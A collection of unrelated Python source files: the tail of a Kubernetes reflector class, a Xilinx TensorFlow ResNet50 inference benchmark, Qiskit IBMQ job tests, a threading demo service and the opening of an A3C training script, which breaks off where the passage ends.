Watches for resources in a particular namespace. The list_methods
want both a method name and a namespace.
"""
omit_namespace = False
class MultiNamespaceResourceReflector(ResourceReflector):
"""
Watches for resources across all namespaces. The list_methods
want only a method name. Note that this requires the service account
to be significantly more powerful, since it must be bound to ClusterRoles
rather than just Roles, and therefore this is inherently more
dangerous.
"""
omit_namespace = True
|
tf_resnet50_inference.py
|
# Copyright 2019 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cv2
import os
import time
import timeit
import threading
from tqdm import tqdm
import numpy as np
import tensorflow as tf
from tensorflow.python.platform import gfile
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import importer
from tensorflow.contrib import vitis_vai
from tensorflow.python.client import timeline
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.framework import dtypes as dtypes_module
from dataloader import DataLoader
from input_fn import calib_input
tf.app.flags.DEFINE_string('input_graph',
'', 'TensorFlow \'GraphDef\' file to load.')
tf.app.flags.DEFINE_string('eval_image_path',
'', 'The directory where put the eval images')
tf.app.flags.DEFINE_string('eval_image_list',
'/workspace/test_performance_classification.list',
'file has validation images list')
tf.app.flags.DEFINE_string(
'preprocess_type', 'inception',
'image preprocess type, choices are inception and vgg')
tf.app.flags.DEFINE_string('input_node', '', 'input node of pb model')
tf.app.flags.DEFINE_string('output_node', '', 'ouput node of pb model')
tf.app.flags.DEFINE_integer('input_height', 224, 'input height of pb model')
tf.app.flags.DEFINE_integer('input_width', 224, 'input width of pb model')
tf.app.flags.DEFINE_integer('label_offset', 1, 'label offset')
tf.app.flags.DEFINE_integer('eval_iter', 10000, 'eval iterations')
tf.app.flags.DEFINE_integer('eval_batch', 8, 'eval batch size')
tf.app.flags.DEFINE_integer('nthreads', 4, 'threads number')
tf.app.flags.DEFINE_string('mode', '', 'accuracy or perf mode')
FLAGS = tf.app.flags.FLAGS
def make_callable(sess, feed=[], target=[], fetch=[]):
def name_list_append(src, dist):
for element in src:
if isinstance(element, tf.Tensor):
dist.append(element.op.name)
elif isinstance(element, tf.Operation):
dist.append(element.name)
else:
raise ValueError("element must be Tensor or Operation")
callable_opts = config_pb2.CallableOptions()
name_list_append(feed, callable_opts.feed)
name_list_append(target, callable_opts.target)
name_list_append(fetch, callable_opts.fetch)
callable_object = sess._make_callable_from_options(callable_opts)
def run_callable(feed_dict):
feed_values = []
for key, value in feed_dict.items():
if not isinstance(value, tf.Tensor):
key_type = dtypes_module.as_dtype(key.dtype)
value = np.asarray(value,
dtype=key_type.as_numpy_dtype)
feed_values.append(value)
return callable_object(*feed_values)
return run_callable
def _parse_input_graph_proto(input_graph, input_binary):
"""Parser input tensorflow graph into GraphDef proto."""
if not gfile.Exists(input_graph):
print("Input graph file '" + input_graph + "' does not exist!")
return -1
input_graph_def = graph_pb2.GraphDef()
mode = "rb" if input_binary else "r"
with gfile.FastGFile(input_graph, mode) as f:
if input_binary:
input_graph_def.ParseFromString(f.read())
else:
text_format.Merge(f.read(), input_graph_def)
return input_graph_def
def run_thread(cnt):
for count in range(cnt, n_of_group, FLAGS.nthreads):
# Using callable object rather than sess.run for better performance;
'''
sess.run([top1_update, top5_update],
feed_dict={
in_image: batch_group[count],
in_label: batch_group_labels[count]
})
'''
sess_callable(feed_dict={
in_image: batch_group[count],
in_label: batch_group_labels[count]
})
def do_run():
threads = []
for i in range(FLAGS.nthreads):
t1 = threading.Thread(target=run_thread, args=(i,))
threads.append(t1)
start_t = time.perf_counter()
for x in threads:
x.start()
for x in threads:
x.join()
end_t = time.perf_counter()
return end_t - start_t
if __name__ == "__main__":
sess = tf.compat.v1.Session()
in_image = tf.compat.v1.placeholder(tf.float32,
shape=(None, FLAGS.input_height,
FLAGS.input_width, 3),
name='in_image')
in_label = tf.compat.v1.placeholder(tf.int64, shape=(None, 1), name='in_label')
input_binary = False if 'txt' in FLAGS.input_graph else True
input_graph_def = _parse_input_graph_proto(FLAGS.input_graph, input_binary)
# Create wego graph through wego's API
vai_wego_graph = vitis_vai.create_wego_graph(
target="DPUCVDX8H_ISA1_F2W2_8PE",
input_graph_def=input_graph_def)
sess.graph.as_default()
_ = importer.import_graph_def(
vai_wego_graph,
name="",
input_map={FLAGS.input_node + ':0': in_image})
logits = sess.graph.get_tensor_by_name(FLAGS.output_node + ':0')
top1, top1_update = tf.compat.v1.metrics.recall_at_k(in_label,
logits,
1,
name="precision_top1")
top5, top5_update = tf.compat.v1.metrics.recall_at_k(in_label,
logits,
5,
name="precision_top5")
var_list = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.LOCAL_VARIABLES,
scope="precision")
vars_initializer = tf.compat.v1.variables_initializer(var_list=var_list)
sess.run(vars_initializer)
with open(FLAGS.eval_image_list, 'r') as fr:
lines = fr.readlines()
if FLAGS.eval_iter > len(lines):
raise ValueError(
"eval_iter(%d) should be fewer than total image numbers(%d)." %
(FLAGS.eval_iter, len(lines)))
eval_steps = np.int64(np.ceil(FLAGS.eval_iter / FLAGS.eval_batch))
print("[INFO] loading %d images with batch mode..."%(FLAGS.eval_iter))
batch_group, batch_group_labels = calib_input(FLAGS.preprocess_type, FLAGS.input_height, FLAGS.input_width,
FLAGS.eval_image_list, eval_steps, FLAGS.eval_batch, FLAGS.eval_iter,
FLAGS.eval_image_path, FLAGS.label_offset)
# Create callable directly for better performance
sess_callable = make_callable(sess, feed=[in_image, in_label], target=[
top1_update, top5_update])
n_of_group = len(batch_group)
mode = FLAGS.mode
if mode != "accuracy" and mode != "perf":
raise ValueError(
"Unsupported mode, support values: [ %s, %s]." %
("accuracy", "perf"))
if mode == "accuracy":
r_n = 1
print("[INFO] start accuracy test...")
do_run()
top1_val, top5_val = sess.run([top1, top5])
print("============ Test Result =============")
print('Total Images: %d' % (FLAGS.eval_iter))
print('Recall_1 = [%s]' % str(top1_val))
print('Recall_5 = [%s]' % str(top5_val))
else:
r_n = 20
print("[INFO] start perf test...")
print("[INFO] repeat running %d times with %d images...." %
(r_n, FLAGS.eval_iter))
t = 0.0
for i in tqdm(range(r_n)):
t += do_run()
print("=========== Perf Result ==============")
print("Total Images: %d" % (FLAGS.eval_iter * r_n))
print('Use_time = [%0.2fs]' % (t))
print('qps = [%0.2f]' % (float(FLAGS.eval_iter) / (t / r_n)))
sess.close()
|
test_ibmq_job.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""IBMQJob Test."""
import time
import copy
from datetime import datetime, timedelta
from unittest import SkipTest, mock, skip
from threading import Thread, Event
from dateutil import tz
from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister
from qiskit.test import slow_test
from qiskit.test.reference_circuits import ReferenceCircuits
from qiskit.compiler import transpile
from qiskit.result import Result
from qiskit.providers.jobstatus import JobStatus, JOB_FINAL_STATES
from qiskit_ibm import least_busy
from qiskit_ibm.apiconstants import ApiJobStatus, API_JOB_FINAL_STATES
from qiskit_ibm.ibmqbackend import IBMQRetiredBackend
from qiskit_ibm.exceptions import IBMQBackendError, IBMQBackendApiError
from qiskit_ibm.utils.utils import api_status_to_job_status
from qiskit_ibm.job.exceptions import IBMQJobTimeoutError
from qiskit_ibm.utils.converters import local_to_utc
from qiskit_ibm.api.rest.job import Job as RestJob
from qiskit_ibm.api.exceptions import RequestsApiError
from ..ibmqtestcase import IBMQTestCase
from ..decorators import (requires_provider, requires_device)
from ..utils import (most_busy_backend, cancel_job,
submit_job_bad_shots, submit_and_cancel, submit_job_one_bad_instr)
from ..fake_account_client import BaseFakeAccountClient, CancelableFakeJob
class TestIBMQJob(IBMQTestCase):
"""Test ibmqjob module."""
@classmethod
@requires_provider
def setUpClass(cls, provider):
"""Initial class level setup."""
# pylint: disable=arguments-differ
super().setUpClass()
cls.provider = provider
cls.sim_backend = provider.get_backend('ibmq_qasm_simulator')
cls.bell = transpile(ReferenceCircuits.bell(), cls.sim_backend)
cls.sim_job = cls.sim_backend.run(cls.bell)
cls.last_month = datetime.now() - timedelta(days=30)
@slow_test
@requires_device
def test_run_device(self, backend):
"""Test running in a real device."""
shots = 8192
job = backend.run(transpile(ReferenceCircuits.bell(), backend=backend),
shots=shots)
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
result = job.result()
counts_qx = result.get_counts(0)
counts_ex = {'00': shots / 2, '11': shots / 2}
self.assertDictAlmostEqual(counts_qx, counts_ex, shots * 0.2)
# Test fetching the job properties, as this is a real backend and is
# guaranteed to have them.
self.assertIsNotNone(job.properties())
def test_run_multiple_simulator(self):
"""Test running multiple jobs in a simulator."""
num_qubits = 16
qr = QuantumRegister(num_qubits, 'qr')
cr = ClassicalRegister(num_qubits, 'cr')
qc = QuantumCircuit(qr, cr)
for i in range(num_qubits - 1):
qc.cx(qr[i], qr[i + 1])
qc.measure(qr, cr)
num_jobs = 5
job_array = [self.sim_backend.run(transpile([qc] * 20), shots=2048)
for _ in range(num_jobs)]
timeout = 30
start_time = time.time()
while True:
check = sum(
[job.status() is JobStatus.RUNNING for job in job_array])
if check >= 2:
self.log.info('found %d simultaneous jobs', check)
break
if all([job.status() is JobStatus.DONE for job in job_array]):
# done too soon? don't generate error
self.log.warning('all jobs completed before simultaneous jobs '
'could be detected')
break
for job in job_array:
self.log.info('%s %s %s %s', job.status(), job.status() is JobStatus.RUNNING,
check, job.job_id())
self.log.info('- %s', str(time.time() - start_time))
if time.time() - start_time > timeout and self.sim_backend.status().pending_jobs <= 5:
raise TimeoutError('Failed to see multiple running jobs after '
'{0} seconds.'.format(timeout))
time.sleep(0.2)
result_array = [job.result() for job in job_array]
self.log.info('got back all job results')
# Ensure all jobs have finished.
self.assertTrue(
all([job.status() is JobStatus.DONE for job in job_array]))
self.assertTrue(all([result.success for result in result_array]))
# Ensure job ids are unique.
job_ids = [job.job_id() for job in job_array]
self.assertEqual(sorted(job_ids), sorted(list(set(job_ids))))
@slow_test
@requires_device
def test_run_multiple_device(self, backend):
"""Test running multiple jobs in a real device."""
num_qubits = 5
qr = QuantumRegister(num_qubits, 'qr')
cr = ClassicalRegister(num_qubits, 'cr')
qc = QuantumCircuit(qr, cr)
for i in range(num_qubits - 1):
qc.cx(qr[i], qr[i + 1])
qc.measure(qr, cr)
num_jobs = 3
job_array = [backend.run(transpile(qc, backend=backend))
for _ in range(num_jobs)]
time.sleep(3) # give time for jobs to start (better way?)
job_status = [job.status() for job in job_array]
num_init = sum(
[status is JobStatus.INITIALIZING for status in job_status])
num_queued = sum([status is JobStatus.QUEUED for status in job_status])
num_running = sum(
[status is JobStatus.RUNNING for status in job_status])
num_done = sum([status is JobStatus.DONE for status in job_status])
num_error = sum([status is JobStatus.ERROR for status in job_status])
self.log.info('number of currently initializing jobs: %d/%d',
num_init, num_jobs)
self.log.info('number of currently queued jobs: %d/%d',
num_queued, num_jobs)
self.log.info('number of currently running jobs: %d/%d',
num_running, num_jobs)
self.log.info('number of currently done jobs: %d/%d',
num_done, num_jobs)
self.log.info('number of errored jobs: %d/%d',
num_error, num_jobs)
self.assertTrue(num_jobs - num_error - num_done > 0)
# Wait for all the results.
for job in job_array:
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
result_array = [job.result() for job in job_array]
# Ensure all jobs have finished.
self.assertTrue(
all([job.status() is JobStatus.DONE for job in job_array]))
self.assertTrue(all([result.success for result in result_array]))
# Ensure job ids are unique.
job_ids = [job.job_id() for job in job_array]
self.assertEqual(sorted(job_ids), sorted(list(set(job_ids))))
def test_cancel(self):
"""Test job cancellation."""
# Find the most busy backend
backend = most_busy_backend(self.provider)
submit_and_cancel(backend)
def test_retrieve_jobs(self):
"""Test retrieving jobs."""
job_list = self.provider.backend.jobs(
backend_name=self.sim_backend.name(), limit=5, skip=0, start_datetime=self.last_month)
self.assertLessEqual(len(job_list), 5)
for job in job_list:
self.assertTrue(isinstance(job.job_id(), str))
def test_retrieve_job(self):
"""Test retrieving a single job."""
retrieved_job = self.provider.backend.retrieve_job(self.sim_job.job_id())
self.assertEqual(self.sim_job.job_id(), retrieved_job.job_id())
self.assertEqual(self.sim_job.qobj().to_dict(), retrieved_job.qobj().to_dict())
self.assertEqual(self.sim_job.result().get_counts(), retrieved_job.result().get_counts())
@requires_device
def test_retrieve_job_uses_appropriate_backend(self, backend):
"""Test that retrieved jobs come from their appropriate backend."""
backend_1 = backend
# Get a second backend.
backend_2 = None
provider = backend.provider()
for my_backend in provider.backends():
if my_backend.status().operational and my_backend.name() != backend_1.name():
backend_2 = my_backend
break
if not backend_2:
raise SkipTest('Skipping test that requires multiple backends')
job_1 = backend_1.run(transpile(ReferenceCircuits.bell(), backend_1))
job_2 = backend_2.run(transpile(ReferenceCircuits.bell(), backend_2))
# test a retrieved job's backend is the same as the queried backend
self.assertEqual(backend_1.retrieve_job(job_1.job_id()).backend().name(),
backend_1.name())
self.assertEqual(backend_2.retrieve_job(job_2.job_id()).backend().name(),
backend_2.name())
# test retrieve requests for jobs that exist on other backends throw errors
with self.assertWarns(Warning) as context_manager:
self.assertRaises(IBMQBackendError,
backend_1.retrieve_job, job_2.job_id())
self.assertIn('belongs to', str(context_manager.warning))
with self.assertWarns(Warning) as context_manager:
self.assertRaises(IBMQBackendError,
backend_2.retrieve_job, job_1.job_id())
self.assertIn('belongs to', str(context_manager.warning))
# Cleanup
for job in [job_1, job_2]:
cancel_job(job)
def test_retrieve_job_error(self):
"""Test retrieving an invalid job."""
self.assertRaises(IBMQBackendError,
self.provider.backend.retrieve_job, 'BAD_JOB_ID')
def test_retrieve_jobs_status(self):
"""Test retrieving jobs filtered by status."""
status_args = [JobStatus.DONE, 'DONE', [JobStatus.DONE], ['DONE']]
for arg in status_args:
with self.subTest(arg=arg):
backend_jobs = self.sim_backend.jobs(limit=5, skip=5, status=arg,
start_datetime=self.last_month)
self.assertTrue(backend_jobs)
for job in backend_jobs:
self.assertTrue(job.status() is JobStatus.DONE,
"Job {} has status {} when it should be DONE"
.format(job.job_id(), job.status()))
def test_retrieve_multiple_job_statuses(self):
"""Test retrieving jobs filtered by multiple job statuses."""
statuses_to_filter = [JobStatus.ERROR, JobStatus.CANCELLED]
status_filters = [
{'status': [JobStatus.ERROR, JobStatus.CANCELLED],
'db_filter': None},
{'status': [JobStatus.CANCELLED],
'db_filter': {'or': [{'status': {'regexp': '^ERROR'}}]}},
{'status': [JobStatus.ERROR],
'db_filter': {'or': [{'status': 'CANCELLED'}]}}
]
job_to_cancel = submit_and_cancel(backend=self.sim_backend)
job_to_fail = submit_job_bad_shots(backend=self.sim_backend)
job_to_fail.wait_for_final_state()
for status_filter in status_filters:
with self.subTest(status_filter=status_filter):
job_list = self.sim_backend.jobs(
status=status_filter['status'],
db_filter=status_filter['db_filter'],
start_datetime=self.last_month)
job_list_ids = [_job.job_id() for _job in job_list]
if job_to_cancel.status() is JobStatus.CANCELLED:
self.assertIn(job_to_cancel.job_id(), job_list_ids)
self.assertIn(job_to_fail.job_id(), job_list_ids)
for filtered_job in job_list:
self.assertIn(filtered_job._status, statuses_to_filter,
"job {} has status {} but should be one of {}"
.format(filtered_job.job_id(), filtered_job._status,
statuses_to_filter))
def test_retrieve_active_jobs(self):
"""Test retrieving jobs that are currently unfinished."""
backend = most_busy_backend(self.provider)
active_job_statuses = {api_status_to_job_status(status) for status in ApiJobStatus
if status not in API_JOB_FINAL_STATES}
job = backend.run(transpile(ReferenceCircuits.bell(), backend))
active_jobs = backend.active_jobs()
if not job.in_final_state(): # Job is still active.
self.assertIn(job.job_id(), [active_job.job_id() for active_job in active_jobs])
for active_job in active_jobs:
self.assertTrue(active_job._status in active_job_statuses,
"status for job {} is '{}' but it should be '{}'."
.format(active_job.job_id(), active_job._status, active_job_statuses))
# Cancel job so it doesn't consume more resources.
cancel_job(job)
def test_retrieve_jobs_queued(self):
"""Test retrieving jobs that are queued."""
backend = most_busy_backend(self.provider)
job = backend.run(transpile(ReferenceCircuits.bell(), backend))
# Wait for the job to queue, run, or reach a final state.
leave_states = list(JOB_FINAL_STATES) + [JobStatus.QUEUED, JobStatus.RUNNING]
while job.status() not in leave_states:
time.sleep(0.5)
before_status = job._status
job_list_queued = backend.jobs(status=JobStatus.QUEUED, limit=5,
start_datetime=self.last_month)
if before_status is JobStatus.QUEUED and job.status() is JobStatus.QUEUED:
self.assertIn(job.job_id(), [queued_job.job_id() for queued_job in job_list_queued],
"job {} is queued but not retrieved when filtering for queued jobs."
.format(job.job_id()))
for queued_job in job_list_queued:
self.assertTrue(queued_job._status == JobStatus.QUEUED,
"status for job {} is '{}' but it should be {}"
.format(queued_job.job_id(), queued_job._status, JobStatus.QUEUED))
# Cancel job so it doesn't consume more resources.
cancel_job(job)
def test_retrieve_jobs_running(self):
"""Test retrieving jobs that are running."""
job = self.sim_backend.run(self.bell)
# Wait for the job to run, or reach a final state.
leave_states = list(JOB_FINAL_STATES) + [JobStatus.RUNNING]
while job.status() not in leave_states:
time.sleep(0.5)
before_status = job._status
job_list_running = self.sim_backend.jobs(status=JobStatus.RUNNING, limit=5,
start_datetime=self.last_month)
if before_status is JobStatus.RUNNING and job.status() is JobStatus.RUNNING:
self.assertIn(job.job_id(), [rjob.job_id() for rjob in job_list_running])
for rjob in job_list_running:
self.assertTrue(rjob._status == JobStatus.RUNNING,
"Status for job {} is '{}' but should be RUNNING"
.format(rjob.job_id(), rjob._status))
def test_retrieve_jobs_start_datetime(self):
"""Test retrieving jobs created after a specified datetime."""
past_month = datetime.now() - timedelta(days=30)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, start_datetime=past_month)
self.assertTrue(job_list)
for job in job_list:
self.assertGreaterEqual(job.creation_date(), past_month_tz_aware,
'job {} creation date {} not within range'
.format(job.job_id(), job.creation_date()))
def test_retrieve_jobs_end_datetime(self):
"""Test retrieving jobs created before a specified datetime."""
past_month = datetime.now() - timedelta(days=30)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, end_datetime=past_month)
self.assertTrue(job_list)
for job in job_list:
self.assertLessEqual(job.creation_date(), past_month_tz_aware,
'job {} creation date {} not within range'
.format(job.job_id(), job.creation_date()))
def test_retrieve_jobs_between_datetimes(self):
"""Test retrieving jobs created between two specified datetimes."""
date_today = datetime.now()
past_month = date_today - timedelta(30)
past_two_month = date_today - timedelta(60)
# Used for `db_filter`, should not override `start_datetime` and `end_datetime` arguments.
past_ten_days = date_today - timedelta(10)
db_filters = [None, {'creationDate': {'gt': past_ten_days}}]
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
past_two_month_tz_aware = past_two_month.replace(tzinfo=tz.tzlocal())
for db_filter in db_filters:
with self.subTest(db_filter=db_filter):
job_list = self.provider.backend.jobs(
backend_name=self.sim_backend.name(), limit=2,
start_datetime=past_two_month, end_datetime=past_month, db_filter=db_filter)
self.assertTrue(job_list)
for job in job_list:
self.assertTrue(
(past_two_month_tz_aware <= job.creation_date() <= past_month_tz_aware),
'job {} creation date {} not within range'.format(
job.job_id(), job.creation_date()))
def test_retrieve_jobs_db_filter(self):
"""Test retrieving jobs using db_filter."""
# Submit jobs with desired attributes.
qc = QuantumCircuit(3, 3)
qc.h(0)
qc.measure([0, 1, 2], [0, 1, 2])
job = self.sim_backend.run(transpile(qc, backend=self.sim_backend))
job.wait_for_final_state()
my_filter = {'backend.name': self.sim_backend.name(),
'summaryData.summary.qobj_config.n_qubits': 3,
'status': 'COMPLETED'}
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, skip=0, db_filter=my_filter,
start_datetime=self.last_month)
self.assertTrue(job_list)
for job in job_list:
job.refresh()
self.assertEqual(
job.summary_data_['summary']['qobj_config']['n_qubits'], 3,
"Job {} does not have correct data.".format(job.job_id())
)
def test_pagination_filter(self):
"""Test db_filter that could conflict with pagination."""
jobs = self.sim_backend.jobs(limit=25, start_datetime=self.last_month)
job = jobs[3]
job_utc = local_to_utc(job.creation_date()).isoformat()
db_filters = [
{'id': {'neq': job.job_id()}},
{'and': [{'id': {'neq': job.job_id()}}]},
{'creationDate': {'neq': job_utc}},
{'and': [{'creationDate': {'gt': job_utc}}]}
]
for db_filter in db_filters:
with self.subTest(filter=db_filter):
job_list = self.sim_backend.jobs(limit=25, db_filter=db_filter)
self.assertTrue(job_list)
self.assertNotIn(job.job_id(), [rjob.job_id() for rjob in job_list],
"Job {} with creation date {} should not be returned".format(
job.job_id(), job_utc))
def test_retrieve_jobs_order(self):
"""Test retrieving jobs with different orders."""
job = self.sim_backend.run(self.bell)
job.wait_for_final_state()
newest_jobs = self.sim_backend.jobs(
limit=10, status=JobStatus.DONE, descending=True, start_datetime=self.last_month)
self.assertIn(job.job_id(), [rjob.job_id() for rjob in newest_jobs])
oldest_jobs = self.sim_backend.jobs(
limit=10, status=JobStatus.DONE, descending=False, start_datetime=self.last_month)
self.assertNotIn(job.job_id(), [rjob.job_id() for rjob in oldest_jobs])
@skip("Skip until aer issue 1214 is fixed")
def test_retrieve_failed_job_simulator_partial(self):
"""Test retrieving partial results from a simulator backend."""
job = submit_job_one_bad_instr(self.sim_backend)
result = job.result(partial=True)
self.assertIsInstance(result, Result)
self.assertTrue(result.results[0].success)
self.assertFalse(result.results[1].success)
@slow_test
def test_pulse_job(self):
"""Test running a pulse job."""
backends = self.provider.backends(open_pulse=True, operational=True)
if not backends:
raise SkipTest('Skipping pulse test since no pulse backend found.')
backend = least_busy(backends)
config = backend.configuration()
defaults = backend.defaults()
inst_map = defaults.instruction_schedule_map
# Run 2 experiments - 1 with x pulse and 1 without
x = inst_map.get('x', 0)
measure = inst_map.get('measure', range(config.n_qubits)) << x.duration
ground_sched = measure
excited_sched = x | measure
schedules = [ground_sched, excited_sched]
job = backend.run(schedules, meas_level=1, shots=256)
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
self.assertTrue(job.done(), "Job {} didn't complete successfully.".format(job.job_id()))
self.assertIsNotNone(job.result(), "Job {} has no result.".format(job.job_id()))
def test_retrieve_from_retired_backend(self):
"""Test retrieving a job from a retired backend."""
saved_backends = copy.copy(self.provider._backends)
try:
del self.provider._backends[self.sim_backend.name()]
new_job = self.provider.backend.retrieve_job(self.sim_job.job_id())
self.assertTrue(isinstance(new_job.backend(), IBMQRetiredBackend))
self.assertNotEqual(new_job.backend().name(), 'unknown')
new_job2 = self.provider.backend.jobs(
db_filter={'id': self.sim_job.job_id()}, start_datetime=self.last_month)[0]
self.assertTrue(isinstance(new_job2.backend(), IBMQRetiredBackend))
self.assertNotEqual(new_job2.backend().name(), 'unknown')
finally:
self.provider._backends = saved_backends
def test_refresh_job_result(self):
"""Test re-retrieving job result via refresh."""
result = self.sim_job.result()
# Save original cached results.
cached_result = copy.deepcopy(result.to_dict())
self.assertTrue(cached_result)
# Modify cached results.
result.results[0].header.name = 'modified_result'
self.assertNotEqual(cached_result, result.to_dict())
self.assertEqual(result.results[0].header.name, 'modified_result')
# Re-retrieve result via refresh.
result = self.sim_job.result(refresh=True)
self.assertDictEqual(cached_result, result.to_dict())
self.assertNotEqual(result.results[0].header.name, 'modified_result')
def test_wait_for_final_state(self):
"""Test waiting for job to reach final state."""
def final_state_callback(c_job_id, c_status, c_job, **kwargs):
"""Job status query callback function."""
self.assertEqual(c_job_id, job.job_id())
self.assertNotIn(c_status, JOB_FINAL_STATES)
self.assertEqual(c_job.job_id(), job.job_id())
self.assertIn('queue_info', kwargs)
queue_info = kwargs.pop('queue_info', None)
callback_info['called'] = True
if wait_time is None:
# Look for status change.
data = {'status': c_status, 'queue_info': queue_info}
self.assertNotEqual(data, callback_info['last data'])
callback_info['last data'] = data
else:
# Check called within wait time.
if callback_info['last call time'] and job._status not in JOB_FINAL_STATES:
self.assertAlmostEqual(
time.time() - callback_info['last call time'], wait_time, delta=0.2)
callback_info['last call time'] = time.time()
def job_canceller(job_, exit_event, wait):
exit_event.wait(wait)
cancel_job(job_)
wait_args = [2, None]
saved_api = self.sim_backend._api_client
try:
self.sim_backend._api_client = BaseFakeAccountClient(job_class=CancelableFakeJob)
for wait_time in wait_args:
with self.subTest(wait_time=wait_time):
# Put callback data in a dictionary to make it mutable.
callback_info = {'called': False, 'last call time': 0.0, 'last data': {}}
cancel_event = Event()
job = self.sim_backend.run(self.bell)
# Cancel the job after a while.
Thread(target=job_canceller, args=(job, cancel_event, 7), daemon=True).start()
try:
job.wait_for_final_state(timeout=10, wait=wait_time,
callback=final_state_callback)
self.assertTrue(job.in_final_state())
self.assertTrue(callback_info['called'])
cancel_event.set()
finally:
# Ensure all threads ended.
for thread in job._executor._threads:
thread.join(0.1)
finally:
self.sim_backend._api_client = saved_api
def test_wait_for_final_state_timeout(self):
"""Test waiting for job to reach final state times out."""
backend = most_busy_backend(self.provider)
job = backend.run(transpile(ReferenceCircuits.bell(), backend=backend))
try:
self.assertRaises(IBMQJobTimeoutError, job.wait_for_final_state, timeout=0.1)
finally:
# Ensure all threads ended.
for thread in job._executor._threads:
thread.join(0.1)
cancel_job(job)
def test_job_submit_partial_fail(self):
"""Test job submit partial fail."""
job_id = []
def _side_effect(self, *args, **kwargs):
# pylint: disable=unused-argument
job_id.append(self.job_id)
raise RequestsApiError('Kaboom')
fail_points = ['put_object_storage', 'callback_upload']
for fail_method in fail_points:
with self.subTest(fail_method=fail_method):
with mock.patch.object(RestJob, fail_method,
side_effect=_side_effect, autospec=True):
with self.assertRaises(IBMQBackendApiError):
self.sim_backend.run(self.bell)
self.assertTrue(job_id, "Job ID not saved.")
job = self.sim_backend.retrieve_job(job_id[0])
self.assertEqual(job.status(), JobStatus.CANCELLED,
f"Job {job.job_id()} status is {job.status()} and not cancelled!")
def test_job_circuits(self):
"""Test job circuits."""
self.assertEqual(str(self.bell), str(self.sim_job.circuits()[0]))
def test_job_backend_options(self):
"""Test job backend options."""
run_config = {'shots': 2048, 'memory': True}
job = self.sim_backend.run(self.bell, **run_config)
self.assertLessEqual(run_config.items(), job.backend_options().items())
def test_job_header(self):
"""Test job header."""
|
threads.py
|
#!/usr/bin/env python3.8
# -*- coding: utf-8 -*-
from argparse import ArgumentParser
from logging import basicConfig, INFO, info
from queue import Queue, Empty
from threading import Lock, Thread, current_thread
from time import sleep
from .jobs import CPUBoundJob
class Service:
""" A service that operates using thread-based concurrency.
"""
def __init__(self):
self.run_lock = Lock()
self.jobs = Queue()
def __str__(self):
return f"Service-{id(self)}"
def add_jobs(self, jobs):
""" Add jobs to the workload queue.
"""
for job in jobs:
self.jobs.put_nowait(job)
def run(self, n_workers, timeout):
""" Run the service with the given number of workers for the
given number of seconds.
"""
workers = []
info(f"Starting {self}")
self.run_lock.acquire()
for _ in range(n_workers):
worker = Thread(target=self.work)
worker.start()
workers.append(worker)
sleep(timeout)
info(f"Stopping {self}")
self.run_lock.release()
for worker in workers:
worker.join()
def work(self):
""" Worker method to continuously process jobs from the
workload until the service stops running.
This method is executed within the Thread context, and will
therefore run multiple times, concurrently.
"""
me = current_thread().name
info(f"{me} is starting work")
while self.run_lock.locked():
try:
job = self.jobs.get(timeout=1.0)
except Empty:
# A queue.Queue will raise a queue.Empty exception if
# the get() call times out.
info(f"{me} has no work to do")
else:
info(f"{me} is processing {job}")
job.process()
info(f"{me} has completed {job}")
info(f"{me} has finished work")
def main():
""" Create and run a demo service to demonstrate concurrency using
threads.
"""
parser = ArgumentParser(description=main.__doc__)
parser.add_argument("--jobs", type=int, default=20, help="number of jobs")
parser.add_argument("--seed", type=int, default=None, help="random seed")
parser.add_argument("--time", type=float, default=10.0, help="time to run (seconds)")
parser.add_argument("--workers", type=int, default=4, help="number of workers")
args = parser.parse_args()
#
service = Service()
service.add_jobs(CPUBoundJob.create_random_list(args.jobs, seed=args.seed))
service.run(n_workers=args.workers, timeout=args.time)
if __name__ == "__main__":
basicConfig(level=INFO)
main()
|
a3c.py
|
# -*- coding: utf-8 -*-
import tensorflow as tf
import threading
import numpy as np
import signal
import random
import math
import os
import time
from game_ac_network import GameACFFNetwork, GameACLSTMNetwork
from a3c_training_thread import A3CTrainingThread
from rmsprop_applier import RMSPropApplier
from constants import ACTION_SIZE
from constants import PARALLEL_SIZE
from constants import INITIAL_ALPHA_LOW
from constants import INITIAL_ALPHA_HIGH
from constants import INITIAL_ALPHA_LOG_RATE
from constants import MAX_TIME_STEP
from constants import CHECKPOINT_DIR
from constants import LOG_FILE
from constants import RMSP_EPSILON
from constants import RMSP_ALPHA
from constants import GRAD_NORM_CLIP
from constants import USE_GPU
from constants import NUM_GPU
from constants import USE_LSTM
def log_uniform(lo, hi, rate):
log_lo = math.log(lo)
log_hi = math.log(hi)
v = log_lo * (1-rate) + log_hi * rate
return math.exp(v)
initial_learning_rate = log_uniform(INITIAL_ALPHA_LOW,
INITIAL_ALPHA_HIGH,
INITIAL_ALPHA_LOG_RATE)
global_t = 0
stop_requested = False
global_device = "/gpu:0"
if USE_LSTM:
global_network = GameACLSTMNetwork(ACTION_SIZE, -1, global_device)
else:
